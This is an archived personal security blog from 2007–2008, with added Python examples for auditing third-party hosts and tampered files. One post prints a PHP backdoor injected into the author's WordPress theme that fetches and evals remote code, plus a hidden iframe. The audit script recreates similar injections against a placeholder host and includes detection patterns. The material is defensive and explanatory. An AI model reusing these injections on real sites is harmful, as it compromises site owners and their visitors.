Archive for the ‘Security’ Category

Does your website *all* belong to you?

12 Feb 2008 14:13 by Rick

When we build web sites we don’t necessarily create all the content ourselves. For various reasons we might subcontract out parts of it to third parties. Some examples are banner advertising and external widgets such as page counters and other statistics. In each case the code we insert on behalf of the third party pulls in content from their web servers and we have little control over it.

Now you might imagine that the big advertising company that you are signed up with have their reputation to consider and would only serve you good banners but it is not as simple as that. They sell on advertising space (syndicate) to other companies. The person visiting your site may be in another country; the code can tell that and will adjust the response accordingly; that is called geo-targeting. Now the agency doesn’t necessarily have material for that country so they contract out to yet another company to do it for them. This can happen many times before the advert is delivered, sometimes on a geographical basis, sometimes on a share arrangement—all without you knowing anything about it. You trusted the original supplier, and they trusted their subcontractor but it is getting a bit thin by the time the eventual supplier is reached and it is not uncommon for that one to be sending a virus or spy-ware to your customer. Yes, they are still your customer and will hold you responsible for what happens.

The other example I suggested was page counters; they are useless but small site owners still seem to like them. There used to be hundreds of different ones around but I haven’t looked recently. Some of these go out of business or get bought out without you knowing. The web address may have lapsed and been snapped up by someone else. This new owner could be using it for anything—including sending mal-ware to your visitors. When was the last time you looked at that page counter? Is it still doing what you thought it was?

There are two good, but rather technical, reports linked to from this Google Blog that you should read if you think you may be affected by this.
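
As an added example (not part of the original post), one way to act on this is to inventory every outside host your own page makes the browser fetch from and compare it with the suppliers you have actually reviewed. The sample page, the host names and the reviewed list are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tags whose src/data attribute makes the browser fetch from another server.
FETCHING = {"script": "src", "iframe": "src", "img": "src",
            "embed": "src", "object": "data"}

class ThirdPartyInventory(HTMLParser):
    def __init__(self, own_host):
        super().__init__()
        self.own_host = own_host
        self.found = {}                      # host -> set of tag names

    def handle_starttag(self, tag, attrs):
        attr = FETCHING.get(tag)
        url = dict(attrs).get(attr) if attr else None
        if not url:
            return
        host = urlparse(url).hostname        # None for relative URLs
        if host and host != self.own_host:
            self.found.setdefault(host, set()).add(tag)

def unreviewed_hosts(html, own_host, reviewed):
    """Return {host: [tags]} for outside hosts not on the reviewed list."""
    parser = ThirdPartyInventory(own_host)
    parser.feed(html)
    return {h: sorted(t) for h, t in parser.found.items() if h not in reviewed}

# Constructed sample: one local image, an ad script, a page counter, a widget.
SAMPLE_PAGE = """
<html><body>
<img src="/images/logo.png">
<script src="http://ads.example.net/banner.js"></script>
<img src="http://counter.example.org/hit.gif?site=42">
<iframe src=http://widgets.example.com/stats></iframe>
</body></html>
"""

if __name__ == "__main__":
    report = unreviewed_hosts(SAMPLE_PAGE, "www.example.co.uk",
                              reviewed={"ads.example.net"})
    for host, tags in sorted(report.items()):
        print(f"{host}: loaded via {', '.join(tags)}")
```

This only shows the first hop: the syndication chain described above happens on the suppliers' servers at request time and does not appear in your own markup.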

Wordpress update 2.3.3

6 Feb 2008 23:20 by Rick

This came out yesterday as an emergency patch for a vulnerability. I wouldn’t normally write about it here but, for some reason, they didn’t publish the list of changed files. So here they are:—

xmlrpc.php
wp-content\plugins\akismet.php
wp-admin\install-helper.php
wp-includes\version.php
wp-includes\gettext.php
wp-includes\pluggable.php

It is the first one that is important.

Empty property

22 Jan 2008 22:20 by Rick

This is more of a problem in an area with a lot of holiday homes but The St. Ivean points out that you only have to look for the houses with a Yellow Pages standing by the front door to find one where you won’t be disturbed breaking in.

Donor card

16 Jan 2008 09:37 by Rick

For longer than I can remember, I have carried a Donor Card in my wallet—I have just looked and mine is dated 17 Apr 1986. They were easy to get and quite high profile; on the counter in doctor’s surgeries, dentist’s, blood donor sessions, even non medical places like pubs, newsagents etc. sometimes had them.

Today they are saying that there are nowhere near enough donors and perhaps we should change over to an opt-out system where permission to donate is assumed unless you have made a declaration that you do not want to. I don’t disagree with the idea but in passing I picked up another clue—the NHS Organ Donor Register. I had never heard of it! Is it now true that it is no longer good enough to carry a card but you have to be signed up to some online database? I don’t think I like that idea*. Perhaps that is why the number of available donors is so low.

* I have had a look at the registration web site and, despite the announcement that it uses Digi-Sign and so is secure, that is an illusion. The information required is Name, DOB and Address. This is fairly public information; anyone could fill this in. DOB is a bit harder to obtain, but is not fully private.

Open or not?

15 Jan 2008 14:21 by Rick

There is a big debate going on at the moment prompted by an article by Bruce Schneier in which he explains why he leaves his home Wi-Fi network unsecured i.e. no password, no encryption. He discusses the risks and benefits and comes to the conclusion that, for him, the latter outweigh the former. Note that he is not saying it is for everyone.

The key points in the debate centre around

  • How much you trust your neighbours not to flood your bandwidth.
  • The terms of service from your ISP, if you are bothered about that.
  • The responsibility you have for what travels over your link—e.g. illegal/unsavoury material.
  • Reducing your protection from hackers—this is why it is not for everyone.

I still don’t know which way to turn—which means I secure it for the time being.

Why was Clarkson wrong?

7 Jan 2008 16:01 by Rick

I didn’t see it at the time, but apparently Jeremy Clarkson published his own bank account details in a newspaper article to demonstrate that the loss of the Benefits database was not a big deal. Now he finds that someone has diverted £500 of his money to charity.

In principle, I think he was right, but I wouldn’t have done it. If any money is removed from your account without your permission it is the bank’s fault unless (maybe) you were negligent. The account number and sort codes, your name and address are not secret information. You require more information than that to withdraw or transfer money, but a lot of bank transactions still rely on unreliable signatures and I wouldn’t trust their diligence to check all that carefully.

They say that “The bank cannot find out who did this because of the Data Protection Act and they cannot stop it from happening again.” That is utter rubbish. They may not be able to find out who because they probably don’t know who, if it was done by a forged signature, but any clues they do have are criminal evidence and not subject to data protection from the relevant authorities. I think they perhaps mean that they can’t tell Jeremy. I suspect that in this case, he will not be pressing for an investigation, but normally you should.

The flaw seems to be that some Direct Debit forms do not require a signature and the banks allow this. That is not banking, that is a welfare agency and they should be liable. I have never trusted the Direct Debit system, but I hadn’t realised that it was that bad.

It would have been even funnier if the donation was made to Friends of the Earth :)

Google, We’re Sorry

4 Jan 2008 13:16 by Rick

In the office today we had a spate of the Google “We’re Sorry” screen. We have no idea why but it was coming up on quite innocent single word searches. I had a search around and found a few pages of explanation but I think they have made a few mistakes with the error page. First of all, it doesn’t look like a Google page—the font for the logo is wrong—all the Google error pages are like this. Secondly, it is directing you to a less than perfect source of anti-virus and anti-spyware software. Although it is C|Net, there are some very dodgy downloads in there. But most of all, there is no clearly explained reason why the message appears. Admittedly it is better than earlier versions when it told you point-blank that you were infected but a list of possible reasons would be useful.

When it comes to the Captcha needed to continue working, I can’t read many of them.

Windows XP SP3

17 Dec 2007 12:35 by Rick

This has gone into RC3 - i.e. the last patching before production release. More about it at MajorGeeks but beware this is still an unofficial release and may (will) contain bugs. I would expect the final release in January. This will be good news for anyone with a slightly flaky system or who is planning a rebuild. Having all the updates together in one place makes it so much easier and guarantees that you haven’t missed one.

I wuz hacked

16 Nov 2007 11:06 by Rick

Some time recently (at least I hope it was recently) someone has hacked this blog. It was very subtle and I only discovered it when a friend said that she could no longer get to even my home page. She uses the McAfee security system and got the message

googlerank.info/counter may cause a breach of browser security.

*Why were you redirected to this page?* When we tested, this site attempted to make unauthorized changes to our test PC by exploiting a browser security vulnerability. This is a serious security threat which could lead to an infection of your PC.

The McAfee information page had more details. I had a hunt around and couldn’t see any mention of this googlerank.info site and no iframes and was beginning to think it was a false alarm. But looking at the page source of the front blog page via the view menu in Firefox, I spotted a small line of code apparently advertising a DVD download site. I can’t show it to you now because I forgot to save a copy but it was rather odd. It was designed not to display (using CSS) so must have been there only for the search engine linking credit; also, it made no mention of the googlerank.info site. It was just before the footer code and didn’t appear on any other blog pages so I was drawn to my theme index.php page and, sure enough, between <?php get_sidebar(); ?> and <?php get_footer(); ?> was the offending line of code. Checking over the rest of the file I found another piece immediately after the initial <?php which did mention the offending googlerank.info stuff which was as follows:—

if (isset($_COOKIE['pird']) or isset($_GET['pird'])) {
    if (!isset($_COOKIE['pird'])) setcookie('pird', '12313.412',time()+60*60*24*600);
    eval(gzuncompress(file_get_contents('http://googlerank.info/soft/faq.compressed')));
    exit;
}

I am not exactly sure what it does, the file referenced seems to be missing, but I have chopped the code out now. A Google search doesn’t come up with any hits for this type of hack.

What is worrying is that I don’t know how they got in. I had a good admin password which I have now changed for an even better one. I should also refresh the theme code from source in case there are other changes that I haven’t seen. I will need to look seriously at updating to the latest WordPress version, or perhaps the problem is file permissions? Or is my hosting service compromised? Also, do I need to tell some database somewhere that I am safe again, McAfee seems to have already white-listed me? I can see that there is no point in these security companies telling deliberately malicious sites that they are blacklisted but it would be useful for those of us who have been unknowingly hacked.

As a result I have a lot more respect for McAfee than I did before, I see they also know that the site is hosted in Canada.

Update: Looking around I found that the main site index.htm was also modified. It had the well known line

<iframe src=http://googlerank.info/counter style=display:none></iframe>

so this is probably what McAfee was seeing. What I still don’t know is how it was done. None of the file or directory protections are bad and the date on the files attacked is the same as the original. I have now refreshed everything so it should be clean but if you don’t know how then it remains a concern.

Update 2: Mtekk’s Crib seems to have found a similar problem.

Update 3: Creative Briefing has experienced a similar problem using WordPress version 2.3.3 (the current one at 13-Mar-2008). This is very worrying.
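
An added example, not part of the original post: since the file dates were no help here, this check compares file content against SHA-256 hashes taken from a known-clean copy and also searches for the two kinds of injected line quoted above. The directory layout, the placeholder host injected.example and the sample files are constructed.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Patterns modelled on the two injections quoted in the post.
SUSPICIOUS = {
    "eval of remotely fetched code": re.compile(
        r"eval\s*\([^;]*file_get_contents\s*\(\s*['\"]https?://", re.I),
    "hidden iframe": re.compile(r"<iframe[^>]*display\s*:\s*none", re.I),
}

def build_manifest(root):
    """Map each file's relative path to the SHA-256 of its content."""
    root = Path(root)
    return {p.relative_to(root).as_posix():
            hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*")) if p.is_file()}

def audit(root, clean_manifest):
    """Compare content (not dates) with the clean copy, then pattern-scan."""
    findings = []
    for rel, digest in build_manifest(root).items():
        if rel not in clean_manifest:
            findings.append((rel, "not in clean copy"))
        elif clean_manifest[rel] != digest:
            findings.append((rel, "content changed"))
        text = (Path(root) / rel).read_text(errors="replace")
        findings += [(rel, label) for label, rx in SUSPICIOUS.items()
                     if rx.search(text)]
    return findings

def demo():
    """Constructed site: take a clean manifest, tamper, then audit."""
    with tempfile.TemporaryDirectory() as d:
        site = Path(d)
        theme, home = site / "index.php", site / "index.htm"
        clean_theme = "<?php get_sidebar(); ?>\n<?php get_footer(); ?>\n"
        theme.write_text(clean_theme)
        home.write_text("<html><body>Home</body></html>\n")
        manifest = build_manifest(site)
        # Constructed stand-ins for the injected lines (placeholder host).
        theme.write_text("<?php eval(gzuncompress(file_get_contents("
                         "'http://injected.example/x')));\n" + clean_theme)
        home.write_text("<html><body>Home<iframe src=http://injected.example/c"
                        " style=display:none></iframe></body></html>\n")
        (site / "extra.php").write_text("<?php // unexpected file\n")
        return audit(site, manifest)
```

The manifest has to be built from a copy you trust, such as a fresh download of the theme, and kept somewhere the web server cannot write to.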

Local Shared Objects

15 Nov 2007 16:23 by Rick

These little things are a well kept secret of the browser world. You all know about Cookies? No, well I’ll first explain about them… Cookies are small pieces of data that are stored by your browser on behalf of the sites that you visit.

The problem discovered in the early days of web browsing is that it is a stateless process. Each request for data on a page is independent of every other. Although you know that your request for page 2 is related to your just having read page 1, the server at the other end sees it as an isolated call. If you are following a sequence, such as a process to purchase a book from Amazon, the server needs to know that the pages are all part of the same transaction. It does this by creating a cookie at your end which contains a unique identifier. This is sent along with each subsequent request so that the server can relate them all together without losing track.

There are two sorts of cookie—transient ones which are deleted as soon as the process is completed and longer term dated ones which carry forward information from one browser session to another. There is some security included which only allows a server to read the cookies that it created; this is done by domain name. A good example of a long term cookie is the one that holds your preferences for Google searches so it remembers which languages you prefer etc.

One use for cookies that has gained them a bad reputation is for advertising. The ad-server will store information about what ads it had sent you so it could ensure that you get different ones next time and perhaps also which ones you have clicked on so it can give you more of the same. These became known as tracking cookies, but it is not really as bad as it sounds; the security is still there and the only information that could be called personal is your network address. There is no suggestion that email addresses, personal names or other such things were disclosed, but by looking at the cookies on a user’s system you could get some idea of what sites they have been browsing. For more information see the Wikipedia article.

Due to their reputation, there is now a problem for companies that need to use them; up to 40% of people delete cookies on a regular basis. There is a built in feature in Firefox (and perhaps IE) to delete all cookies now or every time you shut down. As a result many advertising programs were not working properly.

Enter Macromedia (now Adobe) Flash. This system which operates on top of the standard web protocol is widely used by advertisers (and often disliked by users) because it allows animation and sound. It is also used by sites like YouTube to display short videos on demand and web designers to create really fancy (flashy!) sites. Flash has the capability to read and write cookies but it is cumbersome so they created their own (called Local Shared Objects). This was a good idea when they were used for the same purpose that cookies were designed for. But they are now being used as a backup to standard cookies because most people don’t know about them. If some sites spot that their standard cookie has been deleted, they will read the flash backup copy and immediately recreate the cookie, subverting the intention of the user.

Firefox extensions to the rescue—Objection. It is not very clever but does allow you to see the LSOs that have been created and delete them if needed. I am not suggesting that you get paranoid and delete everything in sight but you deserve to have control over your own browsing experience. Of course you could choose to block Flash altogether! I find animations distracting.